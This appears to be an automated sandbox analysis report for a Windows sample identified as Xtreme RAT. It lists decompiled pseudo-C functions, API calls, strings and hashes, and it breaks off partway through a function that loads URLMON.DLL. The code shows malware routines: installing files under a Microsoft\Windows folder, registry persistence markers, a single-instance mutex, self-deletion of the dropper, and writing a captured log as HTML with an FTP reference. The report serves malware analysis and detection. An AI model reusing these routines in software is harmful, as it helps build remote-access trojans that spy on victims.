                  • Instruction ID: 2f4b2620837c28cfdf5e49335ff29dada521f5c21c6ac21027946eb6f57ed48d
                  • Opcode Fuzzy Hash: 80134d6693af9d9d1c102747081ac19f927ab45dec72332da694b67f7ee99457
                  • Instruction Fuzzy Hash: 20911F78A4024DABFB01EBA4D882FDE7779EF442C1F118162F9046B28ECB75BD058765
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 61%
                  			E1000C080(void* __ebx, void* __edi, void* __esi, WCHAR* _a4) {
                  				char _v8;
                  				char _v12;
                  				intOrPtr _v16;
                  				char _v20;
                  				void* _v24;
                  				char _v28;
                  				char _v40;
                  				char _v162;
                  				char _v164;
                  				intOrPtr _v168;
                  				char _v290;
                  				char _v412;
                  				char _v534;
                  				char _v656;
                  				char _v658;
                  				char _v659;
                  				char _v660;
                  				char _v1026;
                  				char _v1028;
                  				char _v2011;
                  				char _v2012;
                  				void _v5036;
                  				char _v5040;
                  				char _v5564;
                  				char _v5568;
                  				char _v5572;
                  				char _v5576;
                  				char _v5580;
                  				char _v5584;
                  				char _v5588;
                  				char _v5592;
                  				char _v5596;
                  				char _v5600;
                  				char _v5604;
                  				char _v5608;
                  				char _v5612;
                  				char _v5616;
                  				char _v5620;
                  				char _v5624;
                  				char _v5628;
                  				char _v5632;
                  				char _v5636;
                  				char _v5640;
                  				char _v5644;
                  				char _v5648;
                  				char _v5652;
                  				char _v5656;
                  				char _v5660;
                  				char _v5664;
                  				char _v5668;
                  				char _v5672;
                  				char _v5676;
                  				void* _t164;
                  				intOrPtr _t207;
                  				intOrPtr _t209;
                  				char* _t211;
                  				intOrPtr _t212;
                  				intOrPtr _t214;
                  				intOrPtr _t216;
                  				intOrPtr* _t218;
                  				char* _t219;
                  				char* _t220;
                  				intOrPtr _t221;
                  				intOrPtr _t223;
                  				intOrPtr _t226;
                  				char* _t229;
                  				WCHAR* _t235;
                  				void* _t287;
                  				void* _t301;
                  				WCHAR* _t344;
                  				void* _t346;
                  				intOrPtr* _t419;
                  				intOrPtr _t428;
                  				intOrPtr _t435;
                  				WCHAR* _t462;
                  				void* _t464;
                  				void* _t465;
                  				intOrPtr _t467;
                  				intOrPtr _t468;
                  				void* _t476;
                  
                  				_t467 = _t468;
                  				_t346 = 0x2c5;
                  				do {
                  					_push(0);
                  					_push(0);
                  					_t346 = _t346 - 1;
                  					_t471 = _t346;
                  				} while (_t346 != 0);
                  				_push(__ebx);
                  				_push(__esi);
                  				_push(__edi);
                  				_t344 = _a4;
                  				_push(_t467);
                  				_push(0x1000c850);
                  				 *[fs:eax] = _t468;
                  				LoadLibraryA("advapi32.dll");
                  				LoadLibraryA("kernel32.dll");
                  				LoadLibraryA("shell32.dll");
                  				LoadLibraryA("mpr.dll");
                  				LoadLibraryA("version.dll");
                  				LoadLibraryA("comctl32.dll");
                  				LoadLibraryA("gdi32.dll");
                  				LoadLibraryA("opengl32.dll");
                  				LoadLibraryA("user32.dll");
                  				LoadLibraryA("wintrust.dll");
                  				LoadLibraryA("msimg32.dll");
                  				E100050D8();
                  				_t464 =  &(_t344[0x108]);
                  				memcpy( &_v5036, _t464, 0x4e4 << 2);
                  				_t462 = _t464 + 0x9c8;
                  				E10005664( &_v5564);
                  				E100038E0( &_v5040, 0x105,  &_v5564);
                  				E10003928( &_v5040, 0x105, L"\\Microsoft\\Windows\\", _t471);
                  				_t164 = E10005690(E1000390C(_v5040),  *[fs:eax]);
                  				_t472 = _t164 - 1;
                  				if(_t164 != 1) {
                  					E10005664( &_v5564);
                  					E100038E0( &_v5592, 0x105,  &_v5564);
                  					_push(_v5592);
                  					_push(0x1000c958);
                  					E100038E0( &_v5596, 0x3d,  &_v1026);
                  					_push(_v5596);
                  					_push(L".cfg");
                  					E100039EC();
                  					E10005664( &_v5564);
                  					E100038E0( &_v5600, 0x105,  &_v5564);
                  					_push(_v5600);
                  					_push(0x1000c958);
                  					E100038E0( &_v5604, 0x3d,  &_v1026);
                  					_push(_v5604);
                  					_push(L".xtr");
                  					E100039EC();
                  					E10005664( &_v5564);
                  					E100038E0( &_v5608, 0x105,  &_v5564);
                  					_push(_v5608);
                  					_push(0x1000c958);
                  					E100038E0( &_v5612, 0x3d,  &_v1026);
                  					_push(_v5612);
                  					_push(L".dat");
                  					E100039EC();
                  				} else {
                  					E10005664( &_v5564);
                  					E100038E0( &_v5568, 0x105,  &_v5564);
                  					_push(_v5568);
                  					_push(L"\\Microsoft\\Windows\\");
                  					E100038E0( &_v5572, 0x3d,  &_v1026);
                  					_push(_v5572);
                  					_push(L".cfg");
                  					E100039EC();
                  					E10005664( &_v5564);
                  					E100038E0( &_v5576, 0x105,  &_v5564);
                  					_push(_v5576);
                  					_push(L"\\Microsoft\\Windows\\");
                  					E100038E0( &_v5580, 0x3d,  &_v1026);
                  					_push(_v5580);
                  					_push(L".xtr");
                  					E100039EC();
                  					E10005664( &_v5564);
                  					E100038E0( &_v5584, 0x105,  &_v5564);
                  					_push(_v5584);
                  					_push(L"\\Microsoft\\Windows\\");
                  					E100038E0( &_v5588, 0x3d,  &_v1026);
                  					_push(_v5588);
                  					_push(L".dat");
                  					E100039EC();
                  				}
                  				E10006B14(0x2f, _t344, 0x3a, 0x20, _t462, _t464,  &_v5616);
                  				E100034B0( &_v5628, 0x3d,  &_v1026);
                  				E1000352C( &_v5624, _v5628, "SOFTWARE\\");
                  				E100038FC( &_v5620, _v5624);
                  				E1000577C(0x80000001, _t344, L"ServerStarted", _v5620, _t464, _t472, 2, _v5616); // 1000577C wraps RegCreateKeyW/RegSetValueExW; 0x80000001 == HKEY_CURRENT_USER
                  				_v24 = E10004DF0(0, 0,  &_v1026); // subcall 10004DF0 wraps CreateMutexW (see APIs below)
                  				if(GetLastError() == 0xb7) { // 0xb7 == ERROR_ALREADY_EXISTS: the mutex is already held, so another instance runs
                  					ExitProcess(0);
                  				}
                  				E100038E0( &_v5632, 0x105, _t344);
                  				_t361 =  &_v8;
                  				E100099F8(_t344,  &_v8,  &_v5036, _t462, _t464);
                  				E10009E74(_t344,  &_v5036, _t462, _t464);
                  				_t474 = _v2011 - 1;
                  				if(_v2011 == 1) {
                  					E10005D78(_v8, _t344,  &_v8,  &_v5636, _t462, _t464, _t474);
                  					E10005F1C(_v5636, _t344,  &_v8, _t464);
                  					E10005F1C(_v8, _t344, _t361, _t464);
                  				}
                  				_t475 = _v1028 - 1;
                  				if(_v1028 == 1) {
                  					E100034B0( &_v5648, 0x3d,  &_v1026);
                  					E1000352C( &_v5644, _v5648, "SOFTWARE\\");
                  					E100038FC( &_v5640, _v5644);
                  					E1000577C(0x80000001, _t344, L"ServerName", _v5640, _t464, _t475, 2, _v8);
                  				}
                  				_t476 = _v2012 - 1;
                  				if(_t476 == 0) {
                  					E100038E0( &_v5652, 0x105, _t344);
                  					E10003A34(_v5652, _v8);
                  					if(_t476 != 0) {
                  						E100038E0( &_v5656, 0x105, _t344);
                  						_push(_v5656);
                  						E10005954(0,  &_v5660);
                  						_pop(_t301);
                  						E10003A34(_t301, _v5660);
                  						if(0 != 0) {
                  							_t464 = 0;
                  							while(1) {
                  								_t462 = _t344;
                  								if(E10005CA4(_t462) != 1 || _t464 >= 5) {
                  									goto L18;
                  								}
                  								SetFileAttributesW(_t462, 0x80); // 0x80 == FILE_ATTRIBUTE_NORMAL: clear read-only/hidden before deletion
                  								DeleteFileW(_t462); // remove the original dropper; the loop retries up to 5 times
                  								Sleep(0x1f4); // 500 ms between attempts
                  								_t464 = _t464 + 1;
                  								__eflags = _t464;
                  							}
                  						}
                  					}
                  				}
                  				L18:
                  				_t207 =  *0x1000e10c; // 0x1000f80c
                  				E10003770(_t207);
                  				_t209 =  *0x1000e12c; // 0x1000f6a4
                  				E100038E0(_t209, 0x3d,  &_v656);
                  				_t211 =  *0x1000e120; // 0x1000f6c2
                  				 *_t211 = _v659;
                  				_t212 =  *0x1000e100; // 0x1000f6a8
                  				E100038E0(_t212, 0x3d,  &_v534);
                  				_t214 =  *0x1000e110; // 0x1000f6ac
                  				E100038E0(_t214, 0x3d,  &_v412);
                  				_t216 =  *0x1000e114; // 0x1000f6b0
                  				E100038E0(_t216, 0x3d,  &_v290);
                  				_t218 =  *0x1000e11c; // 0x1000f6bc
                  				 *_t218 = _v168;
                  				_t219 =  *0x1000e124; // 0x1000f6c0
                  				 *_t219 = _v164;
                  				_t220 =  *0x1000e118; // 0x1000f6c1
                  				 *_t220 = _v658;
                  				_t221 =  *0x1000e108; // 0x1000f6b4
                  				E100038E0(_t221, 0x3d,  &_v1026);
                  				_t223 =  *0x1000e104; // 0x1000f6b8
                  				E100038E0(_t223, 0x3d,  &_v162);
                  				if(_v660 == 1) {
                  					E100093E4(_t344, _t462, _t464);
                  				}
                  				if(_v40 == 1) {
                  					E1000A480(E1000B634(_t344, _v8, 1, _t464));
                  				}
                  				_t226 =  *0x1000a4e8; // 0x1000a534
                  				E1000A480(E1000AA54(_t226, _t344,  &_v5036, 1, _t462, _t464, _v20));
                  				while(1) {
                  					_t229 =  *0x1000e130; // 0x1000e0bc
                  					_t482 =  *_t229;
                  					if( *_t229 != 0) {
                  						break;
                  					}
                  					E10006058();
                  				}
                  				E10008D4C(_t229);
                  				_t419 =  *0x1000e10c; // 0x1000f80c
                  				E100037D0( &_v12,  *_t419);
                  				_t235 = E1000390C(_v16);
                  				_t345 = _t235;
                  				SetFileAttributesW(_t235, 0x80);
                  				E10005EB4(_t235,  &_v5036, 0x1390, 0);
                  				E100034B0( &_v5672, 0x3d,  &_v1026);
                  				E1000352C( &_v5668, _v5672, "SOFTWARE\\");
                  				E100038FC( &_v5664, _v5668);
                  				E1000577C(0x80000001, _t345, L"InstalledServer", _v5664, _t464, _t482, 2, _v8);
                  				_push(E1000391C(_v12) + _t249);
                  				E10004584();
                  				_push(E1000391C(_v12) + _t254);
                  				E100050D0(_v28, E1000390C(_v12));
                  				if(0 == 0) {
                  					_t465 = 0;
                  					do {
                  						E10005954(0,  &_v5676);
                  						_t287 = E1000BD60(_v28, _t345, _v5676, _t462, _t465);
                  						_t465 = _t465 + 1;
                  					} while (_t465 <= 0xa && _t287 != 1);
                  				}
                  				CloseHandle(_v24);
                  				ExitProcess(0);
                  				_pop(_t428);
                  				 *[fs:eax] = _t428;
                  				_push(E1000C85A);
                  				E10003770( &_v5676);
                  				E100032F0( &_v5672, 2);
                  				E10003788( &_v5664, 4);
                  				E100032F0( &_v5648, 2);
                  				E10003788( &_v5640, 3);
                  				E100032F0( &_v5628, 2);
                  				E10003788( &_v5620, 0xe);
                  				E10003770( &_v5040);
                  				_t435 =  *E1000BD14; // 0x1000bd18
                  				E10004590( &_v28, _t435);
                  				return E10003788( &_v20, 4);
                  			}

                  APIs
                  • LoadLibraryA.KERNEL32(advapi32.dll,00000000,1000C850,?,1000F834,00000000,00000000,00000000,00000000,?,1000D71E,C:\Users\user\Desktop\7FW4ce2RDy.exe,00000000,00000000,00000000,C:\Users\user\Desktop\7FW4ce2RDy.exe), ref: 1000C0A8
                  • LoadLibraryA.KERNEL32(kernel32.dll,advapi32.dll,00000000,1000C850,?,1000F834,00000000,00000000,00000000,00000000,?,1000D71E,C:\Users\user\Desktop\7FW4ce2RDy.exe,00000000,00000000,00000000), ref: 1000C0B2
                  • LoadLibraryA.KERNEL32(shell32.dll,kernel32.dll,advapi32.dll,00000000,1000C850,?,1000F834,00000000,00000000,00000000,00000000,?,1000D71E,C:\Users\user\Desktop\7FW4ce2RDy.exe,00000000,00000000), ref: 1000C0BC
                  • LoadLibraryA.KERNEL32(mpr.dll,shell32.dll,kernel32.dll,advapi32.dll,00000000,1000C850,?,1000F834,00000000,00000000,00000000,00000000,?,1000D71E,C:\Users\user\Desktop\7FW4ce2RDy.exe,00000000), ref: 1000C0C6
                  • LoadLibraryA.KERNEL32(version.dll,mpr.dll,shell32.dll,kernel32.dll,advapi32.dll,00000000,1000C850,?,1000F834,00000000,00000000,00000000,00000000,?,1000D71E,C:\Users\user\Desktop\7FW4ce2RDy.exe), ref: 1000C0D0
                  • LoadLibraryA.KERNEL32(comctl32.dll,version.dll,mpr.dll,shell32.dll,kernel32.dll,advapi32.dll,00000000,1000C850,?,1000F834,00000000,00000000,00000000,00000000,?,1000D71E), ref: 1000C0DA
                  • LoadLibraryA.KERNEL32(gdi32.dll,comctl32.dll,version.dll,mpr.dll,shell32.dll,kernel32.dll,advapi32.dll,00000000,1000C850,?,1000F834,00000000,00000000,00000000,00000000), ref: 1000C0E4
                  • LoadLibraryA.KERNEL32(opengl32.dll,gdi32.dll,comctl32.dll,version.dll,mpr.dll,shell32.dll,kernel32.dll,advapi32.dll,00000000,1000C850,?,1000F834,00000000,00000000,00000000,00000000), ref: 1000C0EE
                  • LoadLibraryA.KERNEL32(user32.dll,opengl32.dll,gdi32.dll,comctl32.dll,version.dll,mpr.dll,shell32.dll,kernel32.dll,advapi32.dll,00000000,1000C850,?,1000F834,00000000,00000000,00000000), ref: 1000C0F8
                  • LoadLibraryA.KERNEL32(wintrust.dll,user32.dll,opengl32.dll,gdi32.dll,comctl32.dll,version.dll,mpr.dll,shell32.dll,kernel32.dll,advapi32.dll,00000000,1000C850,?,1000F834,00000000,00000000), ref: 1000C102
                  • LoadLibraryA.KERNEL32(msimg32.dll,wintrust.dll,user32.dll,opengl32.dll,gdi32.dll,comctl32.dll,version.dll,mpr.dll,shell32.dll,kernel32.dll,advapi32.dll,00000000,1000C850,?,1000F834,00000000), ref: 1000C10C
                    • Part of subcall function 10006B14: GetLocalTime.KERNEL32(?,00000000,10006CD2,?,?,?,?,00000000,00000000,0000003A,?,1000C3BA,?,.dat,?,1000C958), ref: 10006B42
                    • Part of subcall function 1000577C: RegCreateKeyW.ADVAPI32(80000001,00000000,?), ref: 100057C2
                    • Part of subcall function 1000577C: RegSetValueExW.ADVAPI32(?,00000000,00000000,?,00000000,00000000,00000000,10005825,?,1000F834), ref: 100057EE
                    • Part of subcall function 1000577C: RegCloseKey.ADVAPI32(?,?,00000000,00000000,?,00000000,00000000,00000000,10005825,?,1000F834), ref: 100057FD
                    • Part of subcall function 10004DF0: CreateMutexW.KERNEL32(?,?,?,?,1000D54A,00000000,00000000,HgDdsuTd), ref: 10004E06
                  • GetLastError.KERNEL32(00000000,00000000,?,00000002,?,?,.dat,?,1000C958,?,.xtr,?,1000C958,?,.cfg,?), ref: 1000C428
                  • ExitProcess.KERNEL32(00000000,00000000,00000000,?,00000002,?,?,.dat,?,1000C958,?,.xtr,?,1000C958,?,.cfg), ref: 1000C436
                  • SetFileAttributesW.KERNEL32(?,00000080,00000000,00000000,?,00000002,?,?,.dat,?,1000C958,?,.xtr,?,1000C958,?), ref: 1000C567
                  • DeleteFileW.KERNEL32(?,?,00000080,00000000,00000000,?,00000002,?,?,.dat,?,1000C958,?,.xtr,?,1000C958), ref: 1000C56D
                  • Sleep.KERNEL32(000001F4,?,?,00000080,00000000,00000000,?,00000002,?,?,.dat,?,1000C958,?,.xtr,?), ref: 1000C577
                  • SetFileAttributesW.KERNEL32(00000000,00000080,?,00000000,00000000,?,00000002,?,?,.dat,?,1000C958,?,.xtr,?,1000C958), ref: 1000C6C4
                  • CloseHandle.KERNEL32(?), ref: 1000C7A5
                  • ExitProcess.KERNEL32(00000000,?), ref: 1000C7AC
                    • Part of subcall function 100093E4: ShowWindow.USER32(00000000,00000000,00000000,100095DE,?,00000000,00000000,00000000,?,1000C659,00000000,00000000,?,00000002,?,?), ref: 10009443
                    • Part of subcall function 100093E4: SetFileAttributesW.KERNEL32(00000000,00000080,00000000,00000000,00000000,100095DE,?,00000000,00000000,00000000,?,1000C659,00000000,00000000,?,00000002), ref: 10009467
                    • Part of subcall function 100093E4: CreateFileW.KERNEL32(00000000,C0000000,00000003,00000000,00000004,00000000,00000000,00000000,00000080,00000000,00000000,00000000,100095DE,?,00000000,00000000), ref: 10009486
                    • Part of subcall function 100093E4: GetFileSize.KERNEL32(00000000,00000000,00000000,C0000000,00000003,00000000,00000004,00000000,00000000,00000000,00000080,00000000,00000000,00000000,100095DE), ref: 100094C3
                    • Part of subcall function 100093E4: SetFileAttributesW.KERNEL32(00000000,00000007,00000000,C0000000,00000003,00000000,00000004,00000000,00000000,00000000,00000080,00000000,00000000,00000000,100095DE), ref: 10009554
                    • Part of subcall function 10003788: SysFreeString.OLEAUT32(?), ref: 1000379B
                    • Part of subcall function 10003770: SysFreeString.OLEAUT32(1000CFDC), ref: 1000377E
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.296449823.0000000010001000.00000080.00020000.sdmp, Offset: 10000000, based on PE: true
                  • Associated: 00000000.00000002.296445717.0000000010000000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.296460173.000000001000E000.00000040.00020000.sdmp
                  • Associated: 00000000.00000002.296468274.0000000010044000.00000040.00020000.sdmp
                  • Associated: 00000000.00000002.296472928.0000000010048000.00000080.00020000.sdmp
                  • Associated: 00000000.00000002.296483936.0000000010056000.00000008.00020000.sdmp
                  • Associated: 00000000.00000002.296489316.0000000010058000.00000004.00020000.sdmp
                  Yara matches
                  Similarity
                  • API ID: LibraryLoad$File$Attributes$Create$CloseExitFreeProcessString$DeleteErrorHandleLastLocalMutexShowSizeSleepTimeValueWindow
                  • String ID: .cfg$.dat$.xtr$InstalledServer$SOFTWARE\$ServerName$ServerStarted$\Microsoft\Windows\$advapi32.dll$comctl32.dll$gdi32.dll$kernel32.dll$mpr.dll$msimg32.dll$opengl32.dll$shell32.dll$user32.dll$version.dll$wintrust.dll
                  • API String ID: 3227317601-3293355523
                  • Opcode ID: b3639d15e6b66cfdcbc8dbfa1c87ea71f727a03fb1ab0cbb14dc5b81470b7835
                  • Instruction ID: 1bb01a822c3cd363219a61f58cecc4d3cd4d7df1aa5892b4b649a7b9097d74e2
                  • Opcode Fuzzy Hash: b3639d15e6b66cfdcbc8dbfa1c87ea71f727a03fb1ab0cbb14dc5b81470b7835
                  • Instruction Fuzzy Hash: 58128D7890025D9BEB21DB50CC82EDEB3B9EF84381F4080E5E5096B299DB71BF858F55
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 84%
                  			E10008DA4(void* __eax, void* __ebx, WCHAR* __ecx, intOrPtr __edx, void* __edi, void* __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                  				intOrPtr _v8;
                  				void* _v12;
                  				struct _OVERLAPPED* _v16;
                  				struct _OVERLAPPED* _v20;
                  				long _v24;
                  				struct _OVERLAPPED* _v32;
                  				struct _OVERLAPPED* _v36;
                  				char _v37;
                  				void _v38;
                  				char _v44;
                  				char _v48;
                  				char _v52;
                  				void* _t58;
                  				long _t61;
                  				long _t62;
                  				int _t63;
                  				long _t64;
                  				long _t67;
                  				void* _t68;
                  				void* _t79;
                  				void* _t81;
                  				int _t83;
                  				long _t84;
                  				void* _t96;
                  				long _t117;
                  				void* _t125;
                  				intOrPtr _t132;
                  				intOrPtr _t135;
                  				struct _OVERLAPPED* _t138;
                  				struct _OVERLAPPED* _t139;
                  				intOrPtr _t144;
                  				void* _t148;
                  				WCHAR* _t150;
                  				void* _t153;
                  
                  				_push(__ebx);
                  				_push(__esi);
                  				_push(__edi);
                  				_v52 = 0;
                  				_v44 = 0;
                  				_v48 = 0;
                  				_v12 = 0;
                  				_t150 = __ecx;
                  				_v8 = __edx;
                  				_t148 = __eax;
                  				_push(_t153);
                  				_push(0x1000907b);
                  				_push( *[fs:eax]);
                  				 *[fs:eax] = _t153 + 0xffffffd0;
                  				if( *0x1000e0b8 != 0xffffffff) {
                  					_v36 = 0;
                  					_v32 = 0;
                  					_t58 =  *0x1000e0b8; // 0x0
                  					_v20 = GetFileSize(_t58, 0);
                  					_v16 = 0;
                  					if(_v16 != 0) {
                  						if(__eflags > 0) {
                  							goto L5;
                  						}
                  					} else {
                  						if(_v20 > 0) {
                  							L5:
                  							_v36 = _v20;
                  							_v32 = _v16;
                  						}
                  					}
                  					if(_v32 != 0) {
                  						if(__eflags > 0) {
                  							goto L10;
                  						}
                  					} else {
                  						if(_v36 > 0) {
                  							L10:
                  							 *0x1000f6c4 = E10006788(0, _t148, _t150, __eflags);
                  							 *0x1000f6c8 = 0;
                  							_t61 =  *0x1000f6c4; // 0x0
                  							_t138 =  *0x1000f6c8; // 0x0
                  							__eflags = _t138 - _v32;
                  							if(__eflags != 0) {
                  								if(__eflags <= 0) {
                  									goto L15;
                  								} else {
                  									goto L14;
                  								}
                  							} else {
                  								__eflags = _t61 - _v36;
                  								if(_t61 <= _v36) {
                  									L15:
                  									_t62 =  *0x1000f6c4; // 0x0
                  									_t139 =  *0x1000f6c8; // 0x0
                  									__eflags = _t139 - _v32;
                  									if(_t139 != _v32) {
                  										goto L17;
                  									} else {
                  										__eflags = _t62 - _v36;
                  										if(_t62 != _v36) {
                  											goto L17;
                  										}
                  									}
                  								} else {
                  									L14:
                  									 *0x1000f6c4 = 0;
                  									 *0x1000f6c8 = 0;
                  									L17:
                  									__eflags =  *0x1000f688;
                  									if( *0x1000f688 != 0) {
                  										_t63 =  *0x1000f694; // 0xc1bc
                  										_t64 =  *0x1000f688; // 0x0
                  										SendMessageA(E1000662C(_t64), _t63, 0, 0);
                  										_t67 =  *0x1000f6c4; // 0x0
                  										_t68 =  *0x1000e0b8; // 0x0
                  										SetFilePointer(_t68, _t67, 0, 0);
                  										asm("sbb edx, [0x1000f6c8]");
                  										E10003BE4( &_v12, E10003FD4(_v36 -  *0x1000f6c4, _v32, 2, 0));
                  										_t79 =  *0x1000e0b8; // 0x0
                  										ReadFile(_t79, _v12, _v36 -  *0x1000f6c4,  &_v24, 0);
                  										_t81 =  *0x1000e0b8; // 0x0
                  										SetFilePointer(_t81, 0, 0, 2);
                  										_t83 =  *0x1000f698; // 0x0
                  										_t84 =  *0x1000f688; // 0x0
                  										SendMessageA(E1000662C(_t84), _t83, 0, 0);
                  										_push(L"<html>\r\n<meta http-equiv=\"Content-Type\" content=\"text/html;charset=UTF-8\">\r\n<head>\r\n<title>Xtreme RAT</title>\r\n</head>\r\n<body>");
                  										_push(_v12);
                  										_push(L"</body>");
                  										_push(0x100091ac);
                  										_push(L"</html>");
                  										E100039EC();
                  										SetFileAttributesW(_t150, 0x80);
                  										DeleteFileW(_t150);
                  										_t125 = CreateFileW(_t150, 0x40000000, 0, 0, 2, 0, 0);
                  										__eflags = _t125 - 0xffffffff;
                  										if(_t125 != 0xffffffff) {
                  											_v38 = 0xff;
                  											_v37 = 0xfe;
                  											WriteFile(_t125,  &_v38, 2,  &_v24, 0);
                  											_t117 = E1000391C(_v12) + _t116;
                  											__eflags = _t117;
                  											WriteFile(_t125, _v12, _t117,  &_v24, 0);
                  										}
                  										CloseHandle(_t125);
                  										_t130 = _t150;
                  										_t143 = _v8;
                  										_t96 = E100068EC(_t148, _t150, _v8, _a4, _a8, _a12);
                  										_t126 = _t96;
                  										__eflags = _t96 - 1;
                  										if(__eflags == 0) {
                  											 *0x1000f6c4 = _v36;
                  											 *0x1000f6c8 = _v32;
                  											E10006710( &_v44, _t130, _t143,  *0x1000f6c4,  *0x1000f6c8);
                  											_t132 =  *0x1000f6b4; // 0x0
                  											E10003988( &_v48, _t132, L"SOFTWARE\\", __eflags);
                  											E1000577C(0x80000001, _t126, L"LastSize", _v48, _t150, __eflags, 2, _v44);
                  										}
                  										_t144 =  *0x1000f684; // 0x0
                  										E10003988( &_v52, 0x100091fc, _t144, __eflags);
                  										DeleteFileW(E1000390C(_v52));
                  									}
                  								}
                  							}
                  						} else {
                  						}
                  					}
                  				}
                  				_pop(_t135);
                  				 *[fs:eax] = _t135;
                  				_push(E10009082);
                  				E10003788( &_v52, 3);
                  				return E10003770( &_v12);
                  			}

                  APIs
                  • GetFileSize.KERNEL32(00000000,00000000,00000000,1000907B), ref: 10008DF5
                  • SendMessageA.USER32(00000000,0000C1BC,00000000,00000000), ref: 10008EB2
                  • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,00000000,0000C1BC,00000000,00000000,00000000,00000000,00000000,1000907B), ref: 10008EC7
                  • ReadFile.KERNEL32(00000000,?,-1000F6C4,?,00000000,00000002,00000000,00000000,00000000,00000000,00000000,00000000,0000C1BC,00000000,00000000,00000000), ref: 10008F0B
                  • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,00000000,?,-1000F6C4,?,00000000,00000002,00000000,00000000,00000000,00000000,00000000,00000000), ref: 10008F1C
                  • SendMessageA.USER32(00000000,00000000,00000000,00000000), ref: 10008F36
                  • SetFileAttributesW.KERNEL32(?,00000080,</html>,100091AC,</body>,?,<html><meta http-equiv="Content-Type" content="text/html;charset=UTF-8"><head><title>Xtreme RAT</title></head><body>,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000002,00000000), ref: 10008F65
                  • DeleteFileW.KERNEL32(?,?,00000080,</html>,100091AC,</body>,?,<html><meta http-equiv="Content-Type" content="text/html;charset=UTF-8"><head><title>Xtreme RAT</title></head><body>,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000002), ref: 10008F6B
                  • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000000,00000000,?,?,00000080,</html>,100091AC,</body>,?,<html><meta http-equiv="Content-Type" content="text/html;charset=UTF-8"><head><title>Xtreme RAT</title></head><body>,00000000), ref: 10008F80
                  • WriteFile.KERNEL32(00000000,000000FF,00000002,?,00000000,?,40000000,00000000,00000000,00000002,00000000,00000000,?,?,00000080,</html>), ref: 10008FA1
                  • WriteFile.KERNEL32(00000000,?,00000000,?,00000000,00000000,000000FF,00000002,?,00000000,?,40000000,00000000,00000000,00000002,00000000), ref: 10008FBC
                  • CloseHandle.KERNEL32(00000000,?,40000000,00000000,00000000,00000002,00000000,00000000,?,?,00000080,</html>,100091AC,</body>,?,<html><meta http-equiv="Content-Type" content="text/html;charset=UTF-8"><head><title>Xtreme RAT</title></head><body>), ref: 10008FC2
                  • DeleteFileW.KERNEL32(00000000,00000000,?,40000000,00000000,00000000,00000002,00000000,00000000,?,?,00000080,</html>,100091AC,</body>,?), ref: 10009053
                  Strings
                  • LastSize, xrefs: 10009028
                  • </body>, xrefs: 10008F43
                  • </html>, xrefs: 10008F4D
                  • FTP, xrefs: 1000903A
                  • <html><meta http-equiv="Content-Type" content="text/html;charset=UTF-8"><head><title>Xtreme RAT</title></head><body>, xrefs: 10008F3B
                  • SOFTWARE\, xrefs: 1000901B
                  Memory Dump Source
                  • Source File: 00000000.00000002.296449823.0000000010001000.00000080.00020000.sdmp, Offset: 10000000, based on PE: true
                  • Associated: 00000000.00000002.296445717.0000000010000000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.296460173.000000001000E000.00000040.00020000.sdmp
                  • Associated: 00000000.00000002.296468274.0000000010044000.00000040.00020000.sdmp
                  • Associated: 00000000.00000002.296472928.0000000010048000.00000080.00020000.sdmp
                  • Associated: 00000000.00000002.296483936.0000000010056000.00000008.00020000.sdmp
                  • Associated: 00000000.00000002.296489316.0000000010058000.00000004.00020000.sdmp
                  Yara matches
                  Similarity
                  • API ID: File$DeleteMessagePointerSendWrite$AttributesCloseCreateHandleReadSize
                  • String ID: </body>$</html>$<html><meta http-equiv="Content-Type" content="text/html;charset=UTF-8"><head><title>Xtreme RAT</title></head><body>$FTP$LastSize$SOFTWARE\
                  • API String ID: 1838766879-265700797
                  • Opcode ID: f4d93d19cd06cdd413e3f82dc448961f8a6b8c18b0a0675b136e39283c67b9ef
                  • Instruction ID: 9ae569672a167bc613e47318ba2929e521b2e386b238916fb1c1f90ba9e27590
                  • Opcode Fuzzy Hash: f4d93d19cd06cdd413e3f82dc448961f8a6b8c18b0a0675b136e39283c67b9ef
                  • Instruction Fuzzy Hash: 2C814D74A00259AFFB10DFA8CC85FEE77F9FB08380F508119F544A72A9CB75A9458B64
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 71%
                  			E1000A558(void* __eax, void* __ebx, void* __ecx, char __edx, void* __edi, void* __esi) {
                  				char _v8;
                  				intOrPtr* _v12;
                  				char _v13;
                  				char _v20;
                  				char _v24;
                  				char _v28;
                  				intOrPtr _v32;
                  				intOrPtr _v36;
                  				intOrPtr _v2520;
                  				intOrPtr _v2524;
                  				char _v4964;
                  				void _v5044;
                  				char _v5048;
                  				char _v5052;
                  				char _v5056;
                  				intOrPtr _v5060;
                  				char _v5064;
                  				char _v5068;
                  				char _v5072;
                  				char _v5076;
                  				char _v5080;
                  				char _v5084;
                  				char _v5088;
                  				void* _t115;
                  				void* _t154;
                  				void* _t159;
                  				intOrPtr _t169;
                  				void* _t189;
                  				void* _t194;
                  				void* _t218;
                  				WCHAR* _t230;
                  				char* _t231;
                  				intOrPtr _t233;
                  				intOrPtr* _t237;
                  				char _t251;
                  				intOrPtr _t254;
                  				void* _t264;
                  				char* _t265;
                  				char _t278;
                  				void* _t279;
                  				char* _t280;
                  				intOrPtr _t296;
                  				void* _t298;
                  				intOrPtr* _t299;
                  				void* _t301;
                  				void* _t302;
                  
                  				_t251 = __edx;
                  				_t301 = _t302;
                  				_t233 = 0x27b;
                  				do {
                  					_push(0);
                  					_push(0);
                  					_t233 = _t233 - 1;
                  				} while (_t233 != 0);
                  				_t1 =  &_v8;
                  				 *_t1 = _t233;
                  				_push(__ebx);
                  				_t298 = __eax;
                  				_push( *_t1);
                  				memcpy( &_v5044, __eax, 0x4e4 << 2);
                  				_pop(_t237);
                  				_v12 = _t237;
                  				_v8 = _t251;
                  				E10003C28( &_v8);
                  				_push(_t301);
                  				_push(0x1000a98b);
                  				_push( *[fs:eax]);
                  				 *[fs:eax] = _t302 + 0xc;
                  				E10003770(_v12);
                  				LoadLibraryA("URLMON.DLL");
                  				LoadLibraryA("shell32.dll");
